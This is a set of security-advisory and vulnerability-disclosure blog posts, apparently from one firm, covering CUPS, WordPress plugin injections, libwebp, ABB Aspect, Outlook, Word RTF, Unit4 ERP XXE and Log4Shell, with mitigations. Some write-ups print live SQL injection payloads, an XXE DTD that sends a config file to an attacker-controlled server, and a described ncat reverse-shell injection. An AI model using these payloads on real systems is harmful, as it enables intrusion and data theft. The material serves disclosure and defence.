An inadvertent data leak from a GitHub push update identified an RCE in the Linux Common Unix Printing System (CUPS) service, as an unauthenticated Remote Code Execution vulnerability with a CVE score of 9.9.
The vulnerabilities:
CVE-2024-47176 | cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker controlled URL.
CVE-2024-47076 | libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker controlled data to the rest of the CUPS system.
CVE-2024-47175 | libppd <= 2.1b1 ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker controlled data in the resulting PPD.
CVE-2024-47177 | cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter.
CUPS and cups-browsed (a service responsible for discovering new printers and automatically adding them to the system) ship with many versions of UNIX, including most GNU/Linux distributions, but can also be installed in BSD, Oracle Solaris, and even Google’s Chrome OS.
Essentially the vulnerability permits an unauthenticated attacker who can reach the CUPS service port (UDP 631) to replace or install new printers with a malicious IPP urls without generating alerting. This can result in arbitrary command execution on an attacked computer which starts a print job.
UDP port 631, if exposed to the internet and belonging to an operating system running the affected CUPS service requires no authentication making this particularly impactful, however an adversary who has established a foothold within a network can achieve a similar results.
Recommendation:
In terms of hardening against the vulnerability, removing cups-browsed if it is not needed is probably the easiest solution, failing that ensure that the CUPS package is updated on affected systems, and if it cannot be updated, then use firewalling to ensure only trusted hosts can connect to UDP port 631.
Like many management systems, WordPress offers extensions to its core functionality that are created by the community and third-party providers. While these extensions are essential for the thriving WordPress ecosystem, the influx of new code introduces fresh vulnerabilities.
Prism Infosec assessed several open-source extensions and found a number of issues that could pose a risk to plugin user’s data and infrastructure. This post details the identification of 4 CVEs.
A benefit of open-source software is the ability to look directly at the code when searching for security issues. This was one approach taken in the assessment of the plugins in this post.
Examining the code for the Newsletters-Lite extension revealed the potential for a command injection vulnerability on the email archiving functionality.
In the snippet above, the archiving function executed a command that was constructed by concatenating user-controlled strings into hard-coded command. This can be highly dangerous if input is not correctly sanitised or checked, as it may allow an attacker to alter the structure and content of the command in unintended ways.
The $query parameter above was taken from user input on the extension’s configuration screen.
The plugin assumed that the user would input a numerical value and no further validation was performed on the server-side. The below request was issued to set the value of “Archive Older Than” to contain an arbitrary shell command.
Backticks were used to ensure that the enclosed call to ncat was interpreted as a subcommand, rather than a part of the original call to mysql. This prevented the malicious input from causing undue syntax errors with the rest of the intended command that could prevent proper execution.
The call to ncat establishes a TCP connection to a host of the attacker’s choosing, upon which it executes the bash interpreter. This technique is called a Reverse Shell. It gives an attacker control over the server’s operating system as the user that the web server software is running under.
Navigating back to the configuration page revealed that the payload had been successfully saved to the database.
Now that the payload was in place, it needed to be executed in order to execute the maliciously constructed shell command and compromise the server. Whilst the archive function runs on a schedule (meaning an attacker could wait), there was an option to run the archive on demand – which allowed the immediate execution of the malicious payload.
When the HTTP request was sent to the server, the reverse shell was established.
The vulnerability was disclosed on WPScan and addressed in version 4.9.3.
As with command injection, unsafe concatenation of user input can lead to SQL injection vulnerabilities.
In the code below for the Easy Newsletter Signups export functionality, user input is concatenated directly into a SQL query. As in the previous example, this allowed an attacker control over the command to be executed by the underlying OS. In this case, it allows them control over the query executed within the database.
User input is taken directly from the $_GET global variable and concatenated into the query string. By intercepting the request for the export operation using BurpSuite, it was possible to inject valid arbitrary SQL via the nsl_id parameter.
GET /wp-admin/admin.php?export=Export+CSV&page=wpens-list&s=&_wpnonce=f59700b4db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpens-list&action=-1&paged=1&nsl_id%5B%5D=265%20UNION%20ALL%20SELECT%20NULL%2cNULL%2cNULL%2cNULL%2cNULL%2cCONCAT(schema_name)%2cNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-&action2=-1 HTTP/1.1
-- REDACTED FOR BREVITY --
The injected query attempts to combine schema information into the intended result set. The CSV data returned in the response contained the database schema requested in the malicious query.
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2023 12:57:40 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Description: File Transfer
Content-Disposition: attachment; filename= wpens-subscribers-01-Sep-2023.csv
Expires: 0
Pragma: public
Connection: close
Content-Type: text/csv;charset=UTF-8
Content-Length: 162
First Name,Last Name,Email,User IP,Created Date
test,test,test18@prisminfosec.com,192.168.178.1,2023-09-01 12:41:18
,,,information_schema,
,,,bitnami_wordpress,
It was then possible to use SQLMap tool to automate the process of exfiltrating the database.
The vulnerability was disclosed on WPScan and no official fix has been released. WordPress has since stated that “This plugin has been closed as of 27 October 2023 and is not available for download. Reason: Security Issue”.
The Track the Click extension was also found to concatenate user input into its statistics query, resulting in a SQL injection vulnerability.
The UI for the function employs a calendar date-picker to populate this parameter. As such, it is expected that the parameter must contain a date.
As no server-side validation was performed, it was possible to inject the SQL SLEEP() function into the affected parameter. A response was received after the amount of time specified in the payload, thereby confirming that there is a blind SQL injection vulnerability.
Exploiting blind SQL injection manually is incredibly arduous and time-consuming. However, tools such as SQLMap automate this process.
The vulnerability was disclosed on WPScan and addressed in version 0.3.12.
CVE-2023-5082: History Log by click5 – SQL Injection
The History Log extension included a social photo feed from Smash Ballon. To facilitate this, it stored data about feed sources in its database. A delete query including the ID of a source was constructed using concatenated, user-controlled data – and was therefore injectable.
The UI itself does not provide an opportunity to influence the value of the source_id parameter. However, it was possible to inject SQL by altering the request using an intercepting proxy.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 481
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
-- REDACTED FOR BREVITY --
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"
sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"
xx
2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)
-- REDACTED FOR BREVITY –
Again, a response was received after the amount of time specified in the payload, thereby confirming that there is a blind SQL injection vulnerability.
The backend database contents were exfiltrated with SQLMap.
The vulnerability was disclosed on WPScan and addressed in version 1.0.13.
Prism Infosec would like to thank the WPScan team for seamlessly handling the disclosure process and hopes that the identified vulnerabilities emphasise the critical importance of proactive security measures in WordPress extensions. Regular security assessments, adherence to secure coding practices, and prompt patching of identified vulnerabilities are essential to mitigate risks and safeguard WordPress-powered websites against malicious exploitation.
All Vulnerabilities were discovered and written by Karolis Narvilas of Prism Infosec.
Last month (September 2023), Google reported that a newly discovered security issue in Google Chrome had been found, it described as a ‘heap buffer overflow in WebP within Google Chrome’ and tracked under CVE-2023-4863. This was first thought to be just another minor bug found within the browser – something to be addressed in a future release.
However, as the root cause was investigated further, it was found that the vulnerability existed not within Chrome, but within the libwebp library itself. This new information allowed security researchers to gain a better understanding of the potential wider impact of the issue and its links to other earlier reported vulnerabilities, including CVE-2023-41064.
With the wider impact now better understood, it became apparent that the vulnerability was not just confined to Chrome but had far-reaching consequences due to the widespread use of the WebP format within various applications; including browsers, email clients, mobile apps, and operating systems.
What is libwebp and why is this a big deal?
The libwebp library is an image processing library, developed by Google and widely used by applications, such as Chrome, to process and render images in the ‘webp’ format.
WebP provides a number of benefits over other more established image formats (such as png, jpg) due to its flexibility in supporting features such as lossy and lossless compression, transparency & animation, making it a popular choice for those software developers wanting to integrate image rendering functionality into their applications and services.
Typically, you’ll see WebP used in places like:
Websites: Modern content management systems and web frameworks often provide plugins or tools for serving WebP images.
Android Devices: Android 4.2.1 (API level 17) and higher support WebP natively.
Apple Devices: WebP isnt natively supported, but third-party libraries, such as SDWebImage, provide WebP integration.
MacOS/Windows: Some modern image editors and viewers support WebP natively. For others, plugins or extensions might be required.
What’s the risk?
The vulnerability was found to exist within the way the libwebp library handles Huffman coding within the WebP file format. Huffman coding, a method to efficiently represent data, was being mishandled, resulting in a potential buffer overflow. A specially crafted WebP image could exploit this flaw by allowing data to be written beyond the allocated memory space, leading to potential malicious attacks.
In real-world terms, this vulnerability has the potential to allow an attacker to create a specially crafted WebP image containing a malicious payload, which when processed by a vulnerable version of the libwebp library, could lead to the malicious payload being executed on the end users device.
So, just by viewing an image, your device could be compromised.
Who’s at risk?
The good news? Not everyone! The bad news? Well, it’s a decent chunk of the internet. Vulnerable systems include web browsers, image processors, and applications using specific libraries to handle WebP, affecting all types of device from mobile, to desktop, to smart devices (such as your TV).
Chances are, if it can be used to view an image, its moire than likely affected.
How can I protect myself from this and other similar vulnerabilities in future?
Well the good news is, there are ways of managing, not only the known risks, but also the unknown risks associated with vulnerabilities of this type.
Patch, Patch, Patch: For the end user, the most powerful tool you have at your disposal patching. It may seem like an overused cliché, but staying up to date with patches and updates is still one of the most powerful tools you have at your disposal for dealing with vulnerabilities and security risks. Vendors, including Google, have started rolling out patches, and it’s crucial to keep your systems updated.
If there’s an update with a security patch for WebP handling for your application, jump on it like it’s a winning lottery ticket.
For the Tech Professionals amongst us, there are also a number of actions and considerations you can implement to minimise the risk to your systems and end users, including:
Memory Sanitisation: Developers should sanitise memory allocations, especially when handling external inputs (like WebP files from the internet). This can be achieved through techniques like bounds checking and proper memory management.
Input Validation: Always validate and sanitise input. Ensure that imported or user supplied media, such as WebP images, conform to expected standards before processing.
Use a Web Application Firewall (WAF): WAFs can detect and block malicious requests, including those carrying files carrying unwanted surprises, such as malicious code.
Regular Code Audits: Regularly review and test your code base for vulnerabilities. Automated tools can help, but manual reviews by experienced developers are invaluable.
On the surface of it, these types of vulnerabilities may sound scary – especially when the risks are embellished and exaggerated by those ever diligent news outlets that consider a Twitter post to be a credible source – but remember, by the time the story of a new vulnerability has broken, the software and service providers impacted have been busy behind the scenes working on addressing the risk, with an update or patch following soon after.
Prism Infosec recently identified two high risk vulnerabilities within the ABB Aspect Control Engine affecting versions prior to 3.07.01. The two vulnerabilities discovered could result in remote code execution (RCE), and privilege escalation within ABB’s Aspect Control Engine software.
Background
During a recent security testing engagement, Prism Infosec discovered an ABB Aspect Appliance through traditional enumeration techniques. A Google search revealed that this is a building management control system and this instance it was misconfigured to be publicly available to the Internet.
Typically, administrative interfaces should not be externally accessible over the Internet unless absolutely necessary. Where this is unavoidable, they should require a secondary layer of authentication such as VPN Access, IP address whitelisting with further controls such as Multi-factor Authentication (MFA).
Prism Infosec gained initial access to the admin interface by using the default credentials documented in the Aspect Control Engine’s publicly available user manual.
Exploitation
Following this access, Prism Infosec were able to identify that the Network Diagnostic function of the ASPECT Appliance was vulnerable to Remote Code Execution, which allowed us to gain access via a reverse-shell to the underlying Linux Operating System and associated internal network infrastructure.
Full details of the Proof of Concept (PoC) are currently being withheld to ensure that all ABB customers have a chance to update and patch the vulnerable software.
Once initial access was achieved, a check against the privileges revealed that the software was running as the ‘apache’ user, a relatively low-level user with limited functionality.
After further investigation, Prism Infosec identified an unintended privilege escalation vulnerability, built into the underlying OS of the ABB Appliance. This then allowed the user to escalate to a root account.
The possibilities here are endless for an adversary, from exfiltrating local data, to enumerating and moving laterally through the internal network.
To summarise, Prism Infosec went from an external IP address open to the internet, to a rooted Linux system, inside an internal network.
Resolution
Prism Infosec quickly made our client aware of these vulnerabilities and disclosed to ABB the findings within their software shortly after. We were delighted to see both parties quickly acknowledging and acting on these issues, from the client ensuring these levels of access were disabled and ABB to patching and releasing an update and advisory to their clients.
Note: As of the current time of writing Prism Infosec will not divulge exact details on how to reproduce these vulnerabilities to ensure users have time to patch and remedy. However, this blog will entail a high-level description before our detailed description on how to reproduce these vulnerabilities is released in the next 90 days (30th August 2023).
Credits and References
CVE-2023-0635 – Privilege escalation to root was discovered by George C
CVE-2023-0636 – Remote code execution was discovered by Karolis N
CVE-2023-0635 Privilege escalation to root The successful attacker can open a shell and escalate access privileges to root.
CVE-2023-0636 Remote code execution The successful attacker is able to leverage a vulnerable network diagnostic component of the ASPECTinterface, to perform Remote Code Execution.
On 14th of March, Microsoft released a security advisory, detailing CVE-2023-23397, a privilege escalation vulnerability, affecting various versions of Microsoft Outlook. The vulnerability has been assigned a CVSS:3.1 score of 9.8 (CRITICAL).
The vulnerability allows a remote, unauthenticated attacker to access a victim’s Net-NTLMv2 hash by sending a tailored email to a compromised system, then use the hash to authenticate the attacker.
According to the Microsoft Security Resource Center (MSRC), the vulnerability already been utilised by a “Russia-based threat actor” in targeted attacks against government, transport, energy, and military sectors in Europe.
Impact of CVE-2023-23397
The attacker could exploit this vulnerability by sending a specially crafted email which triggers automatically when it is retrieved and processed by the Outlook client. This could lead to exploitation before the email is viewed in the Preview Pane.
Furthermore, multiple proof-of-concepts are now widely available. Given that this is a no-user-interaction exploit, the potential for harm is high.
Fixes for CVE-2023-23397
Microsoft has addressed the vulnerability on the 14th of March as part of “Patch Tuesday”, and advises that the safest way to remediate the issue is to apply the security update for the affected products. For those users who are unable to update, the following workarounds are suggested:
Add users to the Protected Users Security Group, which prevents the use of NTLM as an authentication mechanism. Performing this mitigation makes troubleshooting easier than other methods of disabling NTLM. Consider using it for high value accounts such as Domain Admins when possible. Please note: This may cause impact to applications that require NTLM, however the settings will revert once the user is removed from the Protected Users Group. Please see Protected Users Security Group for more information.
Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
Users are advised to apply this patch immediately to avoid potential exploitation of this vulnerability. In addition to applying the patch, users should also review their system configurations to ensure that proper security controls are in place, such as strong access controls and network segmentation. Additionally, organizations should consider implementing security testing and vulnerability scanning to identify and address vulnerabilities before they can be exploited.
On the 14th February 2023, Microsoft released a security advisory detailing CVE-2023-21716 – a Remote Code Execution (RCE) vulnerability affecting a variety of Office, SharePoint, and 365 Application versions. The vulnerability has been assigned a CVSSv3.1 score of 9.8 (CRITICAL), given the ease of exploitability and minimal victim interaction required.
Given that there is now PoC code in the wild and that RTF extensions are commonly permitted through mail gateways Prism Infosec is advising its clients which use the Microsoft Office suite that they should ensure that this issue is suitably remediated in their environments.
Vulnerability Impact:
An unauthenticated attacker may attempt to exploit a heap corruption vulnerability in Microsoft Word’s Rich-Text Format (RTF) parser to achieve arbitrary command execution on the target machine in the event an unsuspecting victim opens a malicious .RTF document. The limitation here, however, is that an attacker may be required to successfully deliver and entice a victim to open the malicious document.
Microsoft’s security advisory has also noted that opening the malicious file may not be at all necessary and the exploit could be triggered via the Preview Pane. Recently, security researcher Joshua J. Drake published a Proof-of-Concept (PoC) script for generating .RTF files which may trigger the issue. Availability of exploit code usually leads to an influx of opportunistic attackers, as they may trivially modify an existing PoC rather than developing an exploit from scratch.
Vulnerability Fixes / Workarounds:
Microsoft has addressed the vulnerability on the 14th of February as part of “Patch Tuesday”, and advises that the safest way to remediate the issue is to apply the security update for the affected products. For those users who are unable to update, the following workarounds are suggested:
Use the Registry Editor to configure a Microsoft Office File Block policy to prevent Office from opening RTF documents from unknown or untrusted sources. Microsoft caveats this approach stating, “If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system.”
Configure Microsoft Outlook to read all mail in plain text – however, it should be noted that this approach may impact user experience due to the lack of images and rich content.
Ensure that Internet inbound files with RTF extensions are quarantined by mail gateways, mail servers, and/or cloud services.
Prism Infosec Identified an XXE vulnerability within Unit4’s Enterprise Resource Planning (ERP) software. This has been assigned CVE-2022-34001. Unit4’s ERP software is a well-known enterprise management suite, which includes financial and project management tools.
Prism Infosec discovered a blind XXE within a specific function of the ERP software. This would allow an authenticated attacker to read arbitrary files from the host server.
CVE-2022-34001 – Proof of Concept
The ERP API supported the use of SOAP calls; Curiously, the ‘ExecuteServerProcessAsynchronously’ SOAP call allowed the insertion of arbitrary XML within its body. To test for XXE, Prism used a simple HTTP outbound call to a Burp Collaborator server to confirm that the XML allowed for entity expansion, and also allowed the SYSTEM call.
The following request shows a snippet of the ‘ExecuteServerProcessAsynchronously’ SOAP call with the embedded XXE payload within XML tags:
This resulted in an HTTP request to the Prism Infosec controlled server:
The request was received from IP address [REDACTED] at 2022-Mar-01 11:24:45 UTC.
GET / HTTP/1.1 Host: burp_collaborator.com
Connection: Keep-Alive
This confirms that entity expansion was enabled, along with being able to leverage protocols such as HTTP and FILE. As SOAP request only responded with an error message, this attack was considered ‘blind’ – so out of band techniques were required to exfiltrate data from the host.
On an attacker-controlled server, the following malicious DTD file was hosted (test.xml):
<!ENTITY % start "<[CDATA["> <!ENTITY % end "]]>"> <!ENTITY % outfile SYSTEM "file:///E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config"> <!ENTITY % goout "<!ENTITY % pop SYSTEM 'http://attacker_controlled_server:8000/%start;%outfile; %end;'>">
The SOAP call was then initiated but referencing the malicious DTD along with the parameter entities to exfiltrate the data:
The decoded data reveals the content of the “E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config” file on the api-services host:
/<[CDATA[ <!-- For more information on how to configure your ASP.NET application, please visit http://go.microsoft.com/fwlink/?LinkId=301879 --> <configuration> <configSections> <section name="agresso.web.api" type="Agresso.Web.Http.Configuration.WebApi.WebApiConfigurationSection, Agresso.Web.Http" /> </configSections> --[Cut]—
The XXE could also be leveraged to make Server-Side Request Forgery (SSRF) calls within the internal network; mapping out the internal network, and making arbitrary requests to any internal hosts.
Prism Infosec contacted the vendor (Unit 4); and supplied all the necessary information so that Unit 4 could confirm and subsequently remediate the vulnerability. Unit 4 responded in a timely matter and started working on a fix for all customers.
Although the test was completed on the latest version of Unit 4 ERP, we have been advised that previous versions of the software may also be affected.
Note: Prism Infosec did not confirm if the vulnerability had been patched; No further testing was conducted after the initial engagement.
Timeline – CVE-2022-34001
Discovered by Prism Infosec during an engagement for client: March 1st 2022
Vendor Informed: March 17th 2022
CVE Assigned: June 19th 2022
Vendor Confirmed Fix, and communicated to customers: July 7th 2022
Prism Infosec Blog Post: July 19th 2022
Vulnerability was discovered and written by Alexis Vanden Eijnde of Prism Infosec.
Our teams are actively responding to the Log4Shell (or LogJam) 0-day threat which has been reported in the Apache Log4j 2 Java library and has been awarded a severity rating of 10 out of 10 by NIST. We are alerting customers to systems and services that may potentially be impacted and assisting with the investigation and remediation of any attacks that may result, in line with guidance from the National Cyber Security Centre.
What’s the problem?
The issue does not just impact services written wholly in Java; it simply requires a single java application leveraging the log4j library on the network. This makes it necessary to check all Java code across the network regardless of whether they are running Linux, Mac or Windows and to determine if these are using the Log4j library.
How does it work?
Vulnerability CVE-2021-44228 allows unauthenticated remote code execution which is triggered by a string provided by the attacker through a variety of different input vectors which is parsed and processed by the Log4j (version 2) vulnerable component.
According to Microsoft, most of the activity to date has been mass scanning of systems. It states the string contains “jndi”, which refers to the Java Naming and Directory Interface followed by the protocol, such as “ldap”, “ldaps”, “rmi”, “dns”, “iiop”, or “http”, which precedes the attacker’s domain. However, attackers have obfuscated these requests using additional characters making them harder to detect.
What should I do?
Customers are advised to patch their systems by updating all copies of Log4j to version 2.15.0 as soon as practicable.
NCSC advice states: “If you are using the Log4j 2 library as a dependency within an application you have developed, ensure you update to version 2.15.0 or later
If you are using an affected third-party application, ensure you keep the product updated to the latest version. The flaw can also be mitigated in previous releases (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath.”
For those unable to carry out the update immediately, Apache has suggested three workarounds as explained by Sophos here as follows:
Run your vulnerable program under Java with an added command line option to suppress JNDI lookups, like this: java -Dlog4j2.formatMsgNoLookups=true This sets a special system property that prevents any sort of {$jndi:...} activity from triggering a network connection, which prevents both exfiltration and remote code implantation.
Set an environment variable to force the same result: set LOG4J_FORMAT_MSG_NO_LOOKUPS=true
Repackage your log4j-core-*.jar file by unzipping it, deleting the component called org/apache/logging/log4j/core/lookup/JndiLookup.class, and zipping the other files back up again
What’s the advice from vendors?
The NCSC recommends following vendor best practice advice in the mitigation of vulnerabilities. Firewall vendors have been quick to issue patches and advice including:
Microsoft365 Defender customers are advised to turn on cloud-delivered protection while users of Microsoft Defender for Endpoint should turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat: Block executable files from running unless they meet a prevalence, age, or trusted list criterion. The wide attack surface of exploited by the attack means teams are also advised to monitor for signs of post-exploitation such as coin mining, lateral movement, and Cobalt Strike.
Azure Firewall Premium customers have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021.
Sophoshas published a list of affected products and published an extended detection and response tool to identify affected Linux servers
Fortigate has released intrusion prevetion system (IPS) rules to detect and block this specific vulnerability as has Juniper.
In the meantime, if you have any concerns, please do reach out to us at contact@prisminfosec.com or on 01242 652 100.
![Privilege Escalation and RCE Vulnerabilities for Multiple ABB Appliances [ASPECT, Matrix, Nexus]. (CVE-2023-0635 / CVE-2023-0636)](https://prisminfosec.com/wp-content/uploads/2023/06/Latest-News-website-6.png)
